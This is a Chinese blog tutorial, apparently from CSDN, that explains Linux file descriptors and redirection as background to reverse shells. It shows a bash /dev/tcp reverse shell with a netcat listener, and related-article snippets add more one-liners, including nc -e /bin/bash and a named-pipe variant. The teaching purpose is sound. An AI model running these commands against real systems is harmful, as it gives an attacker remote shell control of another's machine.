Linux反弹Shell方法

最新推荐文章于 2024-06-01 11:15:00 发布
最新推荐文章于 2024-06-01 11:15:00 发布
阅读量1.5k 收藏 3
点赞数 1
分类专栏: 初学者常见问题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43873557/article/details/113760881
版权

文章目录

Linux反弹Shell方法

Linux标准文件描述符

Linux系统将所有设备都当作文件来处理,而Linux用文件描述符来标识每个文件对象。当Linux启动的时候会默认打开三个文件描述符。

文件描述符 缩写 描述 默认设备
0 STDIN 标准输入 默认设备键盘
1 STDOUT 标准输出 默认设备显示器
2 STDERR 标准错误输出 默认设备显示器

我们与计算机之间的交互是我可以输入一些指令之后它给我一些输出。

文件描述符0:理解为我和计算机交互时的输入,而这个输入默认是指向键盘的;

文件描述符1:理解为我和计算机交互时的输出,而这个输出默认是指向显示器的;

文件描述符2:理解为我和计算机交互时,计算机出现错误时的输出,而这个输出默认是和文件描述符1指向一个位置;

更改标准输出的位置

把标准输出位置更改到test文件中:

exec 1> test

把当前标准输出重定向到test文件中:

➜ ~ ➜  echo 'lst' 1> test
➜ ~ ➜  cat test
lst

更改标准输入的位置

从键盘输入,把输入读入user变量

➜ ~ ➜  read user
testtest
➜ ~ ➜  echo $user
testtest

把test文件中的内容重定向到标准输入:

➜ ~ ➜  read user 0< test
➜ ~ ➜  echo $user
lst

标准错误输出和标准输出的区别是,它在命令出错情况下的输出。

exec 2> test

分配自己的文件描述符:

➜ ~ ➜  exec 5> test
➜ ~ ➜  echo 'are you ok?' 1>&5
➜ ~ ➜  cat test
are you ok?

把文件描述符5指向test文件,然后把当前输出重定向到文件描述符5(用&引用文件描述符,即找到文件描述符指向的目标文件)

/dev/null

特殊文件,写入的任何东西都会被清空。

  1. 把标准错误输出重定向到/dev/null,从而丢掉不想保存的错误信息
whoami 2>/dev/null
  1. 快速移除文件中的数据而不用删除文件
cat /dev/null > test

重定向

重定向是把输出定向到文件或者标准流。重定向输入输出本质上就是重定向文件描述符。

输入重定向

<
从文件读取输入。

输出重定向

>
将输出保存到文件。

>>
将输出追加到文件。

管道

|
将一个程序的输出作为输入发送到另一个程序。

反弹shell的本质

什么是反弹shell

被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。

被控端:

bash -i >& /dev/tcp/10.10.1.11/6666 0>&1

控制端:

nc –lvvp 6666

参数解释:

bash -i
打开一个交互式的bash shell。

/dev目录
/dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发起了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。

/dev/tcp/10.10.1.11/6666
和10.10.1.11的6666端口建立TCP连接

实现控制端和被控端之间的交互

  1. 把被控端的交互式shell输出重定向到控制端:
bash -i > /dev/tcp/10.10.1.11/6666

把被控端执行的命令结果返回到控制端。

UTOOLS1589866718117.png

最低0.47元/天 解锁文章
低头观自在
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux反弹shell的原理详解
01-08
反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shell: nc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一...
谈谈常用Reverse shell,以及他们是怎么做到的。
TA不懒,但还没有添加简介
05-02 886
谈谈常用Reverse shell,以及他们是怎么做到的。
内网渗透之Linux反弹shell(综合)
墨鱼菜鸡
09-10 1364
目录 知识点 Linux mkfifo命令基本用法 1.首先了解linux命令执行顺序 2.然后了解下管道命令(pipe) 3.常见管道命令 4.mkfifo则可以创建命名管道 Linux标准文件描述符 更改标准输出的位置 更改标准输入的位置 /dev/null 重定向 输入重定向 输出重定向 管道 环境 01NC正向Sh...
【安全知识】——LInuxshell反弹姿势合集(更新中)
最新发布
A_991128a的博客
06-01 724
*作者名:白昼安全主页面链接:座右铭: 不要让时代的悲哀成为你的悲哀专研方向: web安全,后渗透技术每日鸡汤: **当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。下面给大家列举一些平时用的比较多的这里的演示环境为。
黑客零基础第一章--反向shell
ShadowBlade
08-09 4911
一篇文章叫你完全掌握反向shell
文件的读写基本操作
热门推荐
范高伦的博客
09-07 1万+
一、文件是计算机中数据持久化存储的表现形式 读写文件标准操作格式1: 1、打开文件:file1 = open('文件名','读写模式') 2、操作文件 3、关闭文件:file1.close() 文件操作完毕后必须关闭,否则长期保持对文件的连接状态,造成内存溢出的现象发生 读写文件操作格式2: # 1、打开文件 file1 = open('demo.txt','w') # 2、操作文件 file1.write('hello world') # 3、关闭文件 file1.close() 1、打开文件:wi
红蓝对抗 linux内网渗透
whatday的专栏
01-11 978
目录 一、前言 二、提权 2.1 利用内核漏洞进行提权 2.2 利用文件权限配置不当进行提权 2.3 利用SUID程序进行提权 三、隧道 3.1 SSH 3.2 nc/ncat 3.3 portmap 3.4 portfw 四、反弹shell 4.1 bash 4.2 netcat 4.3 php 4.4 perl 4.5 python 4.6 ruby 4.7 telnet 4.8 openssl 加密 4.9 完全交互式shell 五、登录态 5.1 ...
不一样的视角剖析Linux 反弹shell水印版.pdf
08-02
【不一样的视角剖析Linux 反弹shell】这篇文档深入探讨了Linux环境下反弹shell的详细知识,作者从独特的角度出发,挑战了传统的分类方法,为读者提供了更细致的理解。反弹shell是渗透测试中的关键技术,它涉及被控端...
Linux下NC反弹shell命令(推荐)
09-15
对于`nc`自身,不使用`-e`参数的反弹Shell方法如下: 1. 创建一个管道(pipe): ```bash mknod /tmp/backpipe p ``` 2. 使用管道启动Shell并连接: ```bash /bin/sh 0| nc x.x.x.x 4444 1>/tmp/backpipe ```...
浅析Linux之bash反弹shell原理
01-08
反弹shell往往是在攻击者无法直接连接受害者的情况下进行的操作,原因有很多,例如目标是局域网,或者开启防火墙的某些策略等情况,而这时,我们就可以让受害者主动向攻击者发起连接,被控端发起请求到控制端某端口...
靶机渗透之Bulldog2(六)
Delity的博客
08-17 331
一、环境准备 一台kali,一台FourAndSix2,能相互ping通 二、靶机发现 1.主机发现,用kali扫描靶机ip地址为192.168.115. nmap -sP 192.168.115.0/24
Linux 反弹shell(二)反弹shell的本质
djph26741的博客
06-14 197
Linux 反弹shell(二)反弹shell的本质 from:https://xz.aliyun.com/t/2549 0X00 前言 在上一篇文章Linux反弹shell(一)文件描述符与重定向,我们已经讨论过了反弹shell中最核心也是相对较难理解的部分,那么接下来我们就可以正式借反弹shell的实例分析回顾前一篇文章讲的知识,并且也加深对反弹shel...
反弹shell总结
weixin_44576725的博客
04-26 4534
反弹shell 在介绍反弹链接的时候先说明什么是正向链接:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面,web服务,ssh,telnet等等,都是正向连接。而反弹shell是指攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。本质上是网络概念的客户端与服务端的角色反转。反弹shell简单来说就是通过命令让靶机的shell的控制权交到攻击者的机器中。 可能有人会问:我们都能够在靶机
HTB-Cronos
TA不懒,但还没有添加简介
12-06 494
HTB-Cronos
渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Linux篇(゚益゚メ) 渗透测试
寻觅的博客
04-19 2391
文章目录相关博客反弹shell介绍Linux基础重定向标准文件操作符空文件联合使用常用反弹方式NetCat(NC)反弹正向NC反向NC 相关博客 Linux信息收集、渗透测试常用命令: https://xunmi.blog.csdn.net/article/details/114970239 Linux常用提权方法: https://xunmi.blog.csdn.net/article/details/115187418 渗透测试常用反弹shell方法(如何渗透测试反弹shell?: https://x
linux 渗透 反弹shell,反弹shell的n种姿势
weixin_36269334的博客
05-13 263
天天被ven师傅吐槽不会日站,然后又看着乐师傅日站,感觉自己好他妈菜,也是时候补一波渗透测试里的一些东西了,虽然我也知道是炒冷饭,但是还是要持续更新,收录一些反弹shell的常规套路和奇淫巧技。当然知其然知其所以然,也会有一些对于相关命令的解析,方便每个渗透测试工作者可以很好的利用,而不是当成exp一样去打bash在各种各样的文章里最最常见的一种,但是需要注意的是,往往在一些渗透测试中并不适用,具...
各种反弹shell方式
m0_58606546的博客
11-17 2293
1、Bash环境下反弹TCP协议shell 首先在本地监听TCP协议443端口 nc -lvp 443 然后在靶机上执行如下命令: 1 bash -i >& /dev/tcp/121.40.248.82/1234 0>&1 1 /bin/bash -i > /dev/tcp/121.40.248.82/1234 0<& 2>&1 1 exec 5<>/dev/tcp/10.10.10.11/443;ca.
Linux常用命令
Small_Tsky的博客
06-17 265
Linux常用命令 tab键可以补全文件路径 文章目录Linux常用命令1.目录切换cd==cd -== 切换到上一个所在目录==cd ~== 切换到用户目录2.目录的创建何删除2.1建立目录==mkdir [m] [--help] [--version] [-m <目录属性>] [目录名称]==1.mkdir 创建子目录2.mkdir –p app2/test 创建两级目录3.rmdir删除“空”的子目录p或--parents 若所要建立目录的上层目录目前尚未建立,则会
Linux 查看用户列表
全村的希望的博客
09-23 785
命令 cat /etc/passwd
linux反弹shell检测
08-22
为了检测 Linux 反弹 shell,可以采取以下几种方法: 1. 监控网络活动:使用网络监控工具,如 tcpdump 或 Wireshark,检查网络流量是否存在异常连接或未知的传出连接。特别关注与反弹 shell 相关的常见端口(如 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值